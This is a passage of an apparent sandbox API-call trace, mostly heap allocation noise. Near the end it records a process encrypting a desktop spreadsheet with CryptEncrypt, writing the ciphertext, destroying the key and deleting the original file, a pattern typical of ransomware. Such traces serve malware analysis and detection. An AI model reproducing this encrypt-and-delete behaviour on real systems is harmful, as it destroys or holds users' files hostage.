0x43cabf8 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0118.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0118.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0118.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0118.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0118.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0118.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0118.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0118.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0118.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0118.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0118.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0118.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0118.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0118.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0118.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0118.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0118.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0118.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0118.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0118.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0118.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0118.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0118.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0118.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0118.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0118.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0118.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0118.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0118.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0118.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0118.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.292] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.293] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.293] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.295] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.295] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.295] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0118.296] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x249c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x24a0) returned 1 [0118.296] CharLowerBuffW (in: lpsz="byte[9377]", cchLength=0xa | out: lpsz="byte[9377]") returned 0xa [0118.296] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.296] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caee0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0118.296] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x451a960*, pdwDataLen=0x144e790*=0x249c, dwBufLen=0x24a0 | out: pbData=0x451a960*, pdwDataLen=0x144e790*=0x24a0) returned 1 [0118.296] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.296] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.296] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.296] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x24a0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0x24a0, lpOverlapped=0x0) returned 1 [0118.297] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0118.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca958, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0118.298] CryptDestroyKey (hKey=0x41ac600) returned 1 [0118.298] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.298] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.298] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0118.298] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0118.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.298] FreeLibrary (hLibModule=0x756e0000) returned 1 [0118.298] CloseHandle (hObject=0x2a0) returned 1 [0118.298] CloseHandle (hObject=0x258) returned 1 [0118.312] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\0ocQBHc.xls", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\0ocQBHc.xls", lpFilePart=0x0) returned 0x23 [0118.313] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\0ocQBHc.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\0ocqbhc.xls")) returned 0x20 [0118.313] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\0ocQBHc.xls", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cea130, ftCreationTime.dwHighDateTime=0x1d5e5cb, ftLastAccessTime.dwLowDateTime=0x4328c100, ftLastAccessTime.dwHighDateTime=0x1d5ef89, ftLastWriteTime.dwLowDateTime=0x4328c100, ftLastWriteTime.dwHighDateTime=0x1d5ef89, nFileSizeHigh=0x0, nFileSizeLow=0x249c, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="0ocQBHc.xls", cAlternateFileName="")) returned 0x41ac540 [0118.313] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\0ocQBHc.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\0ocqbhc.xls")) returned 1 [0118.320] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cea130, ftCreationTime.dwHighDateTime=0x1d5e5cb, ftLastAccessTime.dwLowDateTime=0x4328c100, ftLastAccessTime.dwHighDateTime=0x1d5ef89, ftLastWriteTime.dwLowDateTime=0x4328c100, ftLastWriteTime.dwHighDateTime=0x1d5ef89, nFileSizeHigh=0x0, nFileSizeLow=0x249c, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="0ocQBHc.xls", cAlternateFileName="")) returned 0 [0118.320] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0118.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0118.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0118.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0118.321] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 